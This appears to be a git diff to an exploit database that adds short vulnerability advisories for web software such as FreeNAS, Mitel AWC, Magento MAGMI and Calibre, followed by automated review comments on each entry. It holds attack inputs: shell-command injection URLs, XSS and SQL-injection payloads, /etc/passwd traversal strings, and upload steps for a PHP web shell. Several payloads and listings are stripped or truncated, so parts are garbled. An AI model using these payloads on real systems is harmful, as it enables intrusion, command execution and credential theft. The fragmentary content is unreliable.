diff --git a/files.csv b/files.csv index 5e498b1ff..117ccf165 100755 --- a/files.csv +++ b/files.csv 
@@ -31639,3 +31639,14 @@ id,file,description,date,author,platform,type,port 35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0 35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0 35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0 +35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0 +35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0 +35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 +35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0 +35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 +35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0 +35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 +35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x 'quicksearch_ContentContent' Parameter HTML Injection Vulnerability",2010-12-21,"High-Tech Bridge SA",php,webapps,0 +35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! 
SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0 +35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0 +35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 diff --git a/platforms/linux/remote/35132.txt b/platforms/linux/remote/35132.txt new file mode 100755 index 000000000..9a6bf4d27 --- /dev/null +++ b/platforms/linux/remote/35132.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/45537/info + +Mitel Audio and Web Conferencing (AWC) is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. + +Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application. + +http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/usr/awc/www/users%22%26 +http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26 \ No newline at end of file diff --git a/platforms/php/webapps/35052.txt b/platforms/php/webapps/35052.txt index 39bd4602e..4f28a1d72 100755 --- a/platforms/php/webapps/35052.txt +++ b/platforms/php/webapps/35052.txt 
@@ -1,48 +1,58 @@ Exploit found date: 10/24/2014 -Security Researcher name: Parvinder Singh Bhasin +Security Researcher name: Parvinder Bhasin Contact info: parvinder.bhasin@gmail.com -twitter: @parvinderb - +twitter: @parvinderb - scorpio Currently tested version: -Magento version: Magento CE - 1.8 and newer versions -MAGMI version: v0.7.17a and greater +Magento version: Magento CE - 1.8 older +MAGMI version: v0.7.17a older -MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server. +Download software link: +Magento server: http://www.magentocommerce.com/download +MAGMI Plugin: +https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/ + +MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability +(RFI) which allows an attacker to upload essentially any PHP file (without +any sanity checks). This PHP file could then be used to skim credit card +data, rewrite files, run remote commands, delete files..etc. Essentially, +this gives attacker ability to execute remote commands on the vulnerable +server. -Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure. Steps to reproduce: 1. http:///magmi/web/magmi.php 2. Under upload new plugins: - click on "choose file" - MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. 
After the file has been uploaded, it will say: Plugin packaged installed. - - evil.php: - - - - - "; - - if(function_exists('shell_exec')) { - $command=$_POST['command']; - $output = shell_exec("$command"); - echo "
$output
"; - } - } - else { - echo "
- - -
"; - } - ?> - -3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from: - http:///magmi/plugins/evil.php - - At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc. \ No newline at end of file +click on "choose file" +MAGento plugins are basically php file zipped. So create a php shell and +zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file +has been uploaded, it will say: Plugin packaged installed. + evil.php: + + + + + "; + + if(function_exists('shell_exec')) { + $command=$_POST['command']; + $output = shell_exec("$command"); + echo "
$output
"; + } +} +else { + echo "
+ + +
"; +} +?> + +3. Your malicious evil.php file is extracted now. All you then need to do +is just access the evil.php page from: +http:///magmi/plugins/evil.php + At this point you could really have access to the entire system. Download +any malware, install rootkits, skim credit card data ..etc.etc. diff --git a/platforms/php/webapps/35124.txt b/platforms/php/webapps/35124.txt new file mode 100755 index 000000000..8d153a074 --- /dev/null +++ b/platforms/php/webapps/35124.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/45522/info + +FreeNAS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +FreeNAS 0.7.2.5543 is vulnerable; other versions may also be affected. + +http://www.example.com/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E + + +http://www.example.com/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes \ No newline at end of file diff --git a/platforms/php/webapps/35125.txt b/platforms/php/webapps/35125.txt new file mode 100755 index 000000000..d5ae7e5a0 --- /dev/null +++ b/platforms/php/webapps/35125.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45523/info + +Openfiler is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/admin/system.html?step=2&device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0 \ No newline at end of file diff --git a/platforms/php/webapps/35126.txt b/platforms/php/webapps/35126.txt new file mode 100755 index 000000000..f7de482b9 --- /dev/null +++ b/platforms/php/webapps/35126.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/45530/info + +Habari is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Habari 0.6.5 is affected; other versions may be vulnerable as well. + +http://www.example.com/system/admin/dash_status.php?status_data[1]= +http://www.example.com/system/admin/dash_additem.php?additem_form= \ No newline at end of file diff --git a/platforms/php/webapps/35131.txt b/platforms/php/webapps/35131.txt new file mode 100755 index 000000000..824774a09 --- /dev/null +++ b/platforms/php/webapps/35131.txt 
@@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/45536/info + +Social Share is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +The following example input is available: + +Username: anytext' or verified=1# + +Password: arbitrary_text \ No newline at end of file diff --git a/platforms/php/webapps/35133.txt b/platforms/php/webapps/35133.txt new file mode 100755 index 000000000..c8f86902d --- /dev/null +++ b/platforms/php/webapps/35133.txt 
@@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/45539/info + +The Mediatricks Viva Thumbs plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers can exploit these issues using directory-traversal strings to confirm the existence of local files outside of the WordPress webroot. Information obtained can aid in launching further attacks. + +http://www.example.com/show_image_NpAdvCatPG.php?cache=false&cat=1&filename=/../../../../../../etc/passwd +http://www.example.com/show_image_NpAdvHover.php?cache=false&cat=0&filename=/../../../../../../etc/passwd +http://www.example.com/show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvMainFea.php?cache=false&cat=1&filename=/../../../../../../etc/passwd +http://www.example.com/show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts \ No newline at end of file diff --git a/platforms/php/webapps/35134.txt b/platforms/php/webapps/35134.txt new file mode 100755 index 000000000..e9c1dc5ec --- /dev/null +++ b/platforms/php/webapps/35134.txt 
@@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/45541/info + +ImpressCMS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +ImpressCMS 1.2.3 Final is vulnerable; other versions may also be affected. + +
+'> + + + +
+ \ No newline at end of file diff --git a/platforms/php/webapps/35135.txt b/platforms/php/webapps/35135.txt new file mode 100755 index 000000000..7a69a3663 --- /dev/null +++ b/platforms/php/webapps/35135.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45545/info + +The Classified component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/classified-demo/index.php?option=com_classified&view=ads&name=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35136.txt b/platforms/php/webapps/35136.txt new file mode 100755 index 000000000..9c9e3fe5a --- /dev/null +++ b/platforms/php/webapps/35136.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/45548/info + +The Accept Signups Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Accept Signups 0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack \ No newline at end of file diff --git a/platforms/php/webapps/35137.txt b/platforms/php/webapps/35137.txt new file mode 100755 index 000000000..8aed50966 --- /dev/null +++ b/platforms/php/webapps/35137.txt 
@@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/45550/info + +Social Share is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. + +The following example input is available: + +Vulnerable code: $referrer = $_SERVER[HTTP_REFERER]; header("Location: $referrer"); + +HTTP query ("Referer" field): + +Referer: http://www.example.com/\r\n[second new response] \ No newline at end of file diff --git a/platforms/windows/remote/35130.txt b/platforms/windows/remote/35130.txt new file mode 100755 index 000000000..6221946cf --- /dev/null +++ b/platforms/windows/remote/35130.txt @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/45532/info + +Calibre is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks. + +Calibre 0.7.34 is vulnerable; other versions may also be affected. + + + + + +http://www.example.com/browse/search?query=
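Review bot: in the files.csv hunk the new 35137 row is dated 2010-12-10, earlier than the other ten rows added here (2010-12-21 and 2010-12-22) and earlier than the existing Social Share rows by the same author just above it (2010-12-17, 2010-12-20); check whether 2010-12-22 was intended. Two smaller points in the same hunk: the 35135 description `"Classified Component for Joomla! SQL Injection Vulnerability"` appears to carry a line break inside the quoted field, which will trip CSV consumers that do not handle multi-line fields, and the descriptions mix `Cross Site Scripting` (35124, 35125, 35130, 35136) with `Cross-Site Scripting` (35126); pick one spelling for the index.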
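Review bot: the 35132.txt hunk (Mitel AWC) does not state which versions are affected, whereas the other new files in this commit carry an `X is vulnerable; other versions may also be affected` line; add the version information from the referenced BID 45537, or state that it is unknown, so the entry is usable for patch triage. The file is also committed without a trailing newline (`\ No newline at end of file`), as are all the other new `.txt` files in this commit; add it.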
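Review bot: in the 35052.txt hunk the tested-version lines change from `Magento CE - 1.8 and newer versions` / `v0.7.17a and greater` to `Magento CE - 1.8 older` / `v0.7.17a older`, which both inverts the affected range and leaves it ungrammatical; write it as `1.8 and older` / `0.7.17a and older` and say in the commit why the range flipped, since readers use this line to decide whether they are affected. The hunk also mixes that substantive change (plus the altered contact line, the new download links and the dropped paragraph about Magento informing its customers) with a rewrap of every paragraph, which hides the content edits; separate the rewrap from the edits. Two things to fix while touching the file: the reproduction URLs `http:///magmi/web/magmi.php` and `http:///magmi/plugins/evil.php` have an empty host (the other entries use `http://www.example.com/`), and the embedded `evil.php` listing survives only as fragments (`";`, `$output`, `?>`), so its markup has been stripped; verify that the committed file still contains the complete listing. Finally, the text calls this a `File inclusion vulnerability (RFI)` while the steps it describes are the upload of an arbitrary zipped PHP file with no sanity checks; `unrestricted file upload` describes it more precisely.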
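Review bot: the 35124.txt hunk (FreeNAS) shows the injection in the `lang` parameter and in the middle of the `order` parameter value (`order=nan...me`), but neither the description nor the files.csv row names the parameters; state them so the entry can be matched against a fix. The double blank line between the two URLs is also inconsistent with the other files.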
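Review bot: the 35125.txt hunk (Openfiler) gives no affected version in either the file or its files.csv row, while the neighbouring entries 35124 and 35126 do; add it from the referenced BID 45523 or state that it is unknown.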
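Review bot: in the 35126.txt hunk (Habari) both PoC lines end at `status_data[1]=` and `additem_form=` with no value, so whatever followed the `=` has been stripped, and the committed file does not demonstrate the issue it describes. Check the import against the source; if the content is really gone, restore it or mark the entry as description-only.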
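Review bot: the 35131.txt hunk (Social Share) gives the example `Username` input but not the page or script that receives it, so the files.csv description `'username' Parameter` is the only locator; name the login script in the file so the entry can be tied to the affected code.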
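Review bot: the 35133.txt hunk (Viva Thumbs) places the `show_image_NpAdv*.php` scripts at the site root (`http://www.example.com/show_image_...`), but the description says they belong to a WordPress plugin, which would normally be served from under `wp-content/plugins/`; confirm the path or note that the scripts sit at the root. The `cat` parameter is `0` in the second URL and `1` in the other nine with no explanation; if the value matters, say so, otherwise make them consistent. No affected plugin version is stated.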
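Review bot: the body of the 35134.txt hunk (ImpressCMS) is broken: after the version line only `'>` and blank lines remain of what the `+17` line count says was a form or script block, and the `quicksearch_ContentContent` parameter named in files.csv does not appear anywhere in the file. The markup looks like it was stripped on import; restore it from the source before committing, since the entry is otherwise unusable.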
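Review bot: the 35135.txt hunk (Classified for Joomla!) uses the installation-specific path `/classified-demo/` and the `[SQLi]` placeholder, which is fine as a locator, but states no component version, unlike the other new files; add it from BID 45545 or say it is unknown.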
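Review bot: the 35136.txt hunk (Accept Signups) ends in `email=clshack`, a plain string with no script content, so as committed the line does not show a cross-site scripting issue; either the payload was stripped on import (compare 35126 and 35134) or the line is incomplete. Verify against BID 45548.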
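Review bot: the `Vulnerable code` line in the 35137.txt hunk indexes `$_SERVER` with the bare word `HTTP_REFERER` rather than the string `'HTTP_REFERER'`, which in PHP is an undefined-constant lookup; either quote the source exactly or note the transcription. The file also does not say which script the code comes from; the files.csv row names `vote.php`, so repeat that here. For readers looking for the remediation, the fix is to validate the Referer against an allowlist of local paths (or not redirect to it at all) rather than writing it unchanged into a `Location` header.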
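Review bot: the 35130.txt hunk (Calibre) says `+31` lines, but the visible content ends mid-URL at `http://www.example.com/browse/search?query=` with the value missing, and there is no trace of the directory-traversal part the description promises; as with 35126 and 35134, content appears to have been stripped on import. files.csv also files this entry under `platforms/windows/remote` although the text describes a web-server XSS and traversal issue of the kind filed as `webapps` elsewhere in this commit; check the platform and type columns.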